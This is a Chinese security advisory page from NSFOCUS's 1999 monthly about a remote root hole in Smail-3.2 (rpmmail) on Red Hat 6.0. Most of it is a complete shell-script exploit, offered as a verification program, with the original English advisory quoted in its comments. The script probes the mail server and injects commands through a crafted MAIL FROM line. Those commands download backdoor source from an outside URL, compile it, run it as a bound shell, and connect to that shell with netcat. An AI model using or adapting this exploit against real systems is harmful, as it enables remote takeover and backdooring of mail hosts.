首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第4期->最新漏洞
日期:1999-12-14
Smail-3.2 (rpmmail)的溢出漏洞
漏洞类型:远程、本地
发布日期:1999-10-20
更新日期:1999-11-29
影响系统:
Red Hat 6.0
漏洞描述:
在Red Hat 6.0 附加应用程序CD中的Smail-3.2 (rpmmail)存在一个漏洞。可以让远程或本
地攻击者获得root权限。
检验程序:
#!/bin/sh
# remote root exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com]
# greets to:
# all of gH, "Brock Tellier" for discovering the hole.
# special greets to:
# icesk, mosthated, elux, rhodie, and the rest of #bifemlinux @ undernet
# ---- Brock Tellier''s original advisory
# Greetings,
#
# A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
# Extra Applications CD. The potential compromise for this bug could be remote
# or local root or simply remote command execution as "nobody" or similar,
# depending on your system configuration.
#
# By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can
# get /home/rpmmail/rpmmail (suid root by default, exec''d by .forward remotely)
# to system(3) any command you wish. The command executed does not necessarily
# have root privs because of bash''s handling of euid != uid of caller. Although
# system(3) calls /bin/sh -c, it is linked by default (can anyone verify
# these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the
# system(3) man page:
#
# system() will not, in fact, work properly from programs
# with suid or sgid privileges on systems on which
# /bin/sh is bash version 2, since bash 2 drops privileges
# on startup. (Debian uses a modified bash which does not
# do this when invoked as sh.)
#
# Thus some systems with rpmmail installed are vulnerable to local/remote root,
# all others to remote command execution as an unpriv''d user.
# --- end Brock''s text
# you need to have backdoor source somewhere out on the net
BACKDOOR="http://meltingpot.fortunecity.com/rundberg/521/blackhole.c "
if [ "$1" = "" ]; then
echo "usage: $0 "
exit 0
fi
if [ `which nc` = "" ]; then
echo "this script requires netcat [nc]"
exit 0
fi
rmt=`host $1 | grep -i "$1" | grep -i "has address" | awk ''{print $4}''`
if [ "$rmt" = "" ]; then
echo "unable to obtain address for $1"
exit 0
fi
echo "= remote exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com] ="
echo -n "[**]: Making sure the system is vulnerable.. "
(sleep 1;echo "EXPN rpmmail";sleep 1)|nc -w 4 $1 25 1>vuln.tmp 2>vuln.tmp
cat vuln.tmp | grep "250" | grep "rpmmail -c" >/dev/null 2>&1
if [ ! $? -eq 0 ]; then
echo "no!"
exit 0
fi
echo "yes!"
echo -n "[**]: Setting up our tcp bound shell.. "
(sleep 1;echo 'MAIL FROM: ;lynx\x20-dump\x20$BACKDOOR\x201>unf.c\x202>unf.c\x20;
gcc\x20-o\x20unf\x20unf.c\x20;./unf\x20&;';
sleep 1;echo "RCPT TO: rpmmail";
sleep 1;echo "DATA";
sleep 1;echo "unf";echo ".";
sleep 2;echo "quit")|nc -w 4 $1 25 1>vuln.tmp 2>vuln.tmp
cat vuln.tmp | grep -i " 250 Mail accepted" >/dev/null 2>&1
if [ ! $? -eq 0 ]; then
echo "failed!"
exit 0
fi
echo "success!"
echo -n "[**]: Attempting to obtain access.. "
nc -w 3 $1 5300
echo "done."
echo -n "[**]: Cleaning up local mess.. "
rm vuln.tmp
killall -9 nc 1>/dev/null 2>/dev/null
echo "done."
版权所有,未经许可,不得转载